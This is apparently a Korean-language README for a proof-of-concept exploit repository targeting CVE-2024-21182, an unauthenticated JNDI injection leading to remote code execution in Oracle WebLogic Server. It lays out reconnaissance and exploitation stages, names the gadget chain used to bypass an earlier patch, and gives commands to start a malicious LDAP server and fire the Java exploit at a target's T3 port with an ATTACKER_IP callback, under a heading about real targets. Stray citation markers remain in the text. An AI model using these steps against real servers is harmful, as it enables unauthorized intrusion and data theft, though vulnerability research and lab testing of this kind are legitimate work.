
CVE-2024-21182에 대한 개념 증명 익스플로잇으로, Oracle WebLogic Server에서 T3/IIOP 프로토콜을 통해 인증되지 않은 JNDI 주입으로 원격 코드 실행이 가능합니다. 테스트용 Docker 랩을 포함합니다.
CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE
CVE-2024-21182는 Oracle WebLogic Server의 Core 구성 요소에 영향을 미치는 인증되지 않은 JNDI 인젝션 취약점입니다. 공격자가 T3 또는 IIOP 프로토콜을 통해 원격으로 임의 코드를 실행(RCE)할 수 있으며, 서버의 모든 데이터에 대한 완전한 접근 권한을 얻을 수 있습니다[citation:5][citation:8][citation:9].
이 저장소는 AggregatableOpaqueReference + MessageDestinationReference 가젯 체인을 이용하여 CVE-2023-21839 패치를 우회한 성공적인 개념 증명(PoC) 코드를 포함합니다[citation:2][citation:4].
| 속성 | 값 |
|---|---|
| CVE | CVE-2024-21182 |
| 제품 | Oracle WebLogic Server (Core) |
| 영향받는 버전 | 12.2.1.4.0 및 14.1.1.0.0[citation:7] |
| 사용 가능한 패치 | Oracle Critical Patch Update (2024년 7월 및 2024년 10월)[citation:6] |
| CISA KEV 상태 | 활성 익스플로잇 확인됨 (2026/01/06 추가)[citation:3][citation:8] |
| CISA 완료 기한 | 2026/06/04[citation:8] |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1단계: 정찰: T3/IIOP 포트(7001)가 노출된 WebLogic 서버 식별.
2단계: 분석: 서버가 취약한 버전(12.2.1.4.0 또는 14.1.1.0.0)을 실행 중이거나 2024년 10월 패치가 적용되지 않았는지 확인.
3단계: 익스플로잇 (기술적 흐름):
AggregatableOpaqueReference 객체를 생성합니다[citation:2].referent를 악성 MessageDestinationReference를 가리키도록 수정합니다[citation:4].wlthint3client.jar (WebLogic 설치에서 추출 가능).# 1. 저장소 클론
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182
# 2. 실습 환경 시작 (피해자 + 공격자)
docker-compose up -d
# 3. 자동 익스플로잇 실행
./validate.sh
승인된 실제 대상에 대한 익스플로잇
# 1. 악성 LDAP/HTTP 서버 시작
python3 exploit/ldap_server.py
# 2. 다른 터미널에서 Java 페이로드 실행
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil
현재 CISA 상태: "랜섬웨어 캠페인에 사용되는 것으로 알려짐? 알 수 없음" (그러나 일반적으로 미들웨어 RCE는 랜섬웨어 침입의 초기 벡터입니다).
이 코드는 교육 및 연구 목적으로만 제공됩니다. 명시적 허가 없이 시스템에 이 PoC를 오용하는 것은 불법입니다. 저자는 이 정보의 오용에 대해 책임을 지지 않습니다.
가젯 체인을 발견한 원본 연구자